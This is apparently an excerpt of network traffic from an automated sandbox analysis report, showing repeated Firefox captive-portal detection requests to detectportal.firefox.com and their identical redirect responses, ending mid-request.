                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.336241007 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.432166100 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80082
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:18.116981983 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:18.213208914 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80083
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.910443068 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:28.006788015 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80092
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.928617954 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:30.024494886 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80094
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:31.118729115 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:31.214915037 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80096
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:32.213998079 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:32.309587955 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80097
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:34.845093966 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:34.955174923 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80099
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:39.044183016 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:39.150762081 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80104
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.472949028 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.568917036 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80109
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:48.058177948 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:48.154953003 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80113
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:50.899106979 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:50.995255947 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80115
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:01.004580021 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:05.500749111 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:05.597610950 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80130
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:13.037977934 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:13.134193897 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80138
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:17.044059038 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:17.139887094 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80142
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:27.142641068 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:37.148758888 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.993488073 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
